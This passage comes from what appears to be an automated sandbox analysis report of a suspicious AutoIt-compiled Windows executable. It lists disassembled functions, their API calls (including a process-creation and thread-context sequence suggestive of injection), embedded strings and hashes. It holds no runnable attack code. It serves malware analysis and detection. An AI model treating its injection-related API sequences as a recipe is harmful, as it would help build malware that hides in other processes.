                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: bf077bf5f2ddc1a14a1658a7421fe7a92bd78aa7307106a7cd63dbf773f36e92
                                                      • Instruction ID: 551defe8682aecfcb635441788cb2f7c6534ddddd9ef6364015f0354cc5ceb22
                                                      • Opcode Fuzzy Hash: bf077bf5f2ddc1a14a1658a7421fe7a92bd78aa7307106a7cd63dbf773f36e92
                                                      • Instruction Fuzzy Hash: ADF0C234D0020D778B00BA65EC4AD9E7F6C9E40360B604531BE1996592EF75EB2AF981
                                                      Function 00F93017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F9302F
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F93044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 17d1b6986c55b435fedb450d8ec9aa7fb200ed1a098f8a290f1aba782766b33a
                                                      • Instruction ID: 55576b24c528813992a6d3672dbb1771e05cadd963b91fec4b9444a430950c7d
                                                      • Opcode Fuzzy Hash: 17d1b6986c55b435fedb450d8ec9aa7fb200ed1a098f8a290f1aba782766b33a
                                                      • Instruction Fuzzy Hash: 33D05E7290032C67DA20A7A5AC4EFCB3A6CDB04750F0002A1B755E2091DAB4D984CFE0
                                                      Function 00FA7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00FA82F5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00FA82FC
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00FA84DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                      • String ID:
                                                      • API String ID: 146820519-0
                                                      • Opcode ID: 2f68819733f8b5a346308ee89d6918418e9cf5eba6d70b03a82f370ce0c1b13b
                                                      • Instruction ID: cfc58d7aab1418b53861bafb5ad73bc60d8ab0d1b1d47c66f809b419e79cf75f
                                                      • Opcode Fuzzy Hash: 2f68819733f8b5a346308ee89d6918418e9cf5eba6d70b03a82f370ce0c1b13b
                                                      • Instruction Fuzzy Hash: B1128CB19083019FC714DF28C484B6ABBE1FF89364F04895DE8898B252CB75ED46DF92
                                                      Function 00F55AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7ee2cdc662536f4e8a4189da23bdc3171310ba64a792e4bdc0c2fe010e6f55e
                                                      • Instruction ID: f2e777048a51aa9b6c995c922c0b9302e6172db324bdf75a57787285c47a40bd
                                                      • Opcode Fuzzy Hash: e7ee2cdc662536f4e8a4189da23bdc3171310ba64a792e4bdc0c2fe010e6f55e
                                                      • Instruction Fuzzy Hash: 8451F271D00609ABCB109FB4CC59FAE7FB8AF45B22F140059FE04AB291C6759A09EB61
                                                      Function 00F210F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F21BF4
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F21BFC
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F21C07
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F21C12
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F21C1A
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F21C22
                                                        • Part of subcall function 00F21B4A: RegisterWindowMessageW.USER32(00000004,?,00F212C4), ref: 00F21BA2
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F2136A
                                                      • OleInitialize.OLE32 ref: 00F21388
                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00F624AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: 33ed299c4dc34d11cbce5d00835d91d863aa6ce0d59f3284b20db5ba824b6ed3
                                                      • Instruction ID: 48ec303271ff3f67943d4f95b76c3ca9e629e05c142a68408784755a3ac7b62e
                                                      • Opcode Fuzzy Hash: 33ed299c4dc34d11cbce5d00835d91d863aa6ce0d59f3284b20db5ba824b6ed3
                                                      • Instruction Fuzzy Hash: 6971AAB5901208CFD384EF7AAD456763AE8BF9938475C822AD00ADB272EB354444FF54
                                                      Function 00F586AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00F585CC,?,00FE8CC8,0000000C), ref: 00F58704
                                                      • GetLastError.KERNEL32(?,00F585CC,?,00FE8CC8,0000000C), ref: 00F5870E
                                                      • __dosmaperr.LIBCMT ref: 00F58739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                      • String ID:
                                                      • API String ID: 490808831-0
                                                      • Opcode ID: 052ebe77cea5dbdaf42d325fddaaaa2a493a0650a42bcfcb72baf19ea4acbd21
                                                      • Instruction ID: 01407d68e4c02b36e2d5d9146818e2c56140334aae29c8a301742eba7a018a41
                                                      • Opcode Fuzzy Hash: 052ebe77cea5dbdaf42d325fddaaaa2a493a0650a42bcfcb72baf19ea4acbd21
                                                      • Instruction Fuzzy Hash: 4E010832E0562416D7646234AC4577E7B4A4F81BB6F290219EE18AB1D2DEA48C8AB190
                                                      Function 00F92FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00F92CD4,?,?,?,00000004,00000001), ref: 00F92FF2
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F92CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F93006
                                                      • CloseHandle.KERNEL32(00000000,?,00F92CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F9300D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: bbc491888d37159442d1bca9580412af5fe494e69d5defd9b1c8670b8c62395d
                                                      • Instruction ID: f0907e2ff340b4fb816bac00f43e9049db736e8c0f45629bd9f489a932a65639
                                                      • Opcode Fuzzy Hash: bbc491888d37159442d1bca9580412af5fe494e69d5defd9b1c8670b8c62395d
                                                      • Instruction Fuzzy Hash: 87E0863268021477E6301759BC4DF8B3A5CD786B75F104320F759760D046A0150166E8
                                                      Function 00F31310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00F317F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CALL
                                                      • API String ID: 1385522511-4196123274
                                                      • Opcode ID: 459f466bfd25b7a246418b69966e151c7d166be37a8f1a3fc3da6b05bd106242
                                                      • Instruction ID: e2b41817591969022be0a3d89a5e20b650578ad037a2b4a0f4215aee15dc7c77
                                                      • Opcode Fuzzy Hash: 459f466bfd25b7a246418b69966e151c7d166be37a8f1a3fc3da6b05bd106242
                                                      • Instruction Fuzzy Hash: 51228C71A08201DFC714DF14C880B2ABBF1BF89324F18892DF49A8B361D775E845EB92
                                                      Function 00F96EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00F96F6B
                                                        • Part of subcall function 00F24ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad_wcslen
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      • API String ID: 3312870042-2806939583
                                                      • Opcode ID: c8c7980f181b01a9779db22f9aed6b83e067c21f0bbf6802cdf2cc5daf98b50c
                                                      • Instruction ID: 0e055c8583eb2904398e30f500642c6b4a39e5003ae77549ee975136cbd63b3f
                                                      • Opcode Fuzzy Hash: c8c7980f181b01a9779db22f9aed6b83e067c21f0bbf6802cdf2cc5daf98b50c
                                                      • Instruction Fuzzy Hash: 2AB1B0315183118FDB14FF20D8919AEB7E5BF94310F04882DF496972A2EB34ED49EB92
                                                      Function 00F22DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00F62C8C
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                        • Part of subcall function 00F22DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F22DC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen
                                                      • String ID: X
                                                      • API String ID: 779396738-3081909835
                                                      • Opcode ID: c49248ccd6b9e595c041d3f9bff73bf04e86d799e3bec86b2ff9b3bc4cde0fd7
                                                      • Instruction ID: 313453c0071b94f55fa725dbb3b907d8424d4dfc55cecceacf1951891f5454f5
                                                      • Opcode Fuzzy Hash: c49248ccd6b9e595c041d3f9bff73bf04e86d799e3bec86b2ff9b3bc4cde0fd7
                                                      • Instruction Fuzzy Hash: D9219671A0029C9BDB41EF94DC45BEE7BF8AF58314F004059E405EB241DBB85649AFA1
                                                      Function 00F92557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID: EA06
                                                      • API String ID: 2638373210-3962188686
                                                      • Opcode ID: 3652412907e8be0dec7d857c5e42647c491fd6ec416f882d1a5ea0c8176a7d33
                                                      • Instruction ID: a7ca1aa24ce2a78313a76f3f127fd1fc87054ccab6fe237c7f40cf06e1b73b3d
                                                      • Opcode Fuzzy Hash: 3652412907e8be0dec7d857c5e42647c491fd6ec416f882d1a5ea0c8176a7d33
                                                      • Instruction Fuzzy Hash: 9C01F572C042587EEF18C7A8CC16EAEBBF89B05301F00455EE552D21C1E4B8E6089B60
                                                      Function 00F23837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F23908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 091e0c02bff29a18e92662b276767476d3fc9c810e773030925d0f1a4e8a9585
                                                      • Instruction ID: 6e570c2e7920862d91c3dc500439cebb25066290d16d9e4be21285d5b03d2acb
                                                      • Opcode Fuzzy Hash: 091e0c02bff29a18e92662b276767476d3fc9c810e773030925d0f1a4e8a9585
                                                      • Instruction Fuzzy Hash: 5931A0B1A04315CFD320DF24D8857A7BBE8FF49318F00092EF59987240E775AA44EB52
                                                      Function 00F2B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00F2BB4E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID:
                                                      • API String ID: 1385522511-0
                                                      • Opcode ID: bbd3a9ea2e7939973b2726a052b1cf1efa3f183abf915729fa0ae7f5b8e41f23
                                                      • Instruction ID: 332c1795adc4154069eb4c1327556b8264dac93978bc6432709254bd17cbdf51
                                                      • Opcode Fuzzy Hash: bbd3a9ea2e7939973b2726a052b1cf1efa3f183abf915729fa0ae7f5b8e41f23
                                                      • Instruction Fuzzy Hash: 4C329F75E00219DFDB14CF54D894BBAB7B9EF44320F14805AED09AB251CB78ED81EB52
                                                      Function 0116129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01161A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01161AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01161B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                      • Instruction ID: 51cce7e339274983fe122059e9caf3426fb81d6384cad4071d6fb3caeeb354e9
                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                      • Instruction Fuzzy Hash: FE12DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F91CB5A
                                                      Function 00F24ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F24E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E9C
                                                        • Part of subcall function 00F24E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F24EAE
                                                        • Part of subcall function 00F24E90: FreeLibrary.KERNEL32(00000000,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EC0
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EFD
                                                        • Part of subcall function 00F24E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E62
                                                        • Part of subcall function 00F24E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F24E74
                                                        • Part of subcall function 00F24E59: FreeLibrary.KERNEL32(00000000,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E87
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressFreeProc
                                                      • String ID:
                                                      • API String ID: 2632591731-0
                                                      • Opcode ID: 48f272f90b801678cab12ec9b0a626f0290c502518f9d1131789199655a7eb98
                                                      • Instruction ID: 8ea6cd67da7be5e131dab0a7be332f230bff5ae01d827ccb14521c1cbc050baa
                                                      • Opcode Fuzzy Hash: 48f272f90b801678cab12ec9b0a626f0290c502518f9d1131789199655a7eb98
                                                      • Instruction Fuzzy Hash: 4D11E732610615AADF14EB64ED12FAD77A5AF90B10F10842DF542AB1C1DEB8AE05BB90
                                                      Function 00F58402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: 16cef2c9fe8d02f8faf20fbcb16d2f43b2c94a639e16c0eff98af7c367ea3678
                                                      • Instruction ID: e2e996385bfe147e688ea534f5d0dc0b1d2d7a8bd2fb116916875d0ad4a00abb
                                                      • Opcode Fuzzy Hash: 16cef2c9fe8d02f8faf20fbcb16d2f43b2c94a639e16c0eff98af7c367ea3678
                                                      • Instruction Fuzzy Hash: 4411487190410AAFCB05DF58E9409DA7BF9EF48310F104059FD09AB312DA31DA16DBA4
                                                      Function 00F55000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F54C7D: RtlAllocateHeap.NTDLL(00000008,00F21129,00000000,?,00F52E29,00000001,00000364,?,?,?,00F4F2DE,00F53863,00FF1444,?,00F3FDF5,?), ref: 00F54CBE
                                                      • _free.LIBCMT ref: 00F5506C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
